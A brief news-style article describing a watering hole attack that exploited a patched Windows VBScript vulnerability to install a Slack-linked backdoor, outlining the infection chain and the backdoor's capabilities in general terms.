Hackers have infiltrated the popular business chat software, Slack, using a watering hole attack.
An undocumented backdoor program was utilized by hackers during the attack on Slack, this program was designed to give hackers control of infected computers using Slack.
The “watering hole” attack is a technique for infecting websites of interest.
It’s unclear how victims were directed to the website but the site was manipulated to host an exploit that takes advantage of a vulnerability in the Windows VBScript engine. The CVE20188174 vulnerability can be exploited through Internet Explorer but was patched by Microsoft in May 2018. This is why having an up-to-date operating system is important.
In the situation where the exploit triggered successfully, a multi-stage infection chain would be started. First, a malicious DLL file would be downloaded and executed via PowerShell. This DLL scanned for antivirus programs before deciding whether to install the aformentioned backdoor program.
The goal of the hack was to collect information on victims and their activity on social media and private chat logs, however, it also possesses the ability to start and close applications on the victims device (including viruses), take screenshots, steal personal files, enable and view the victims webcam, or completely destroy the device.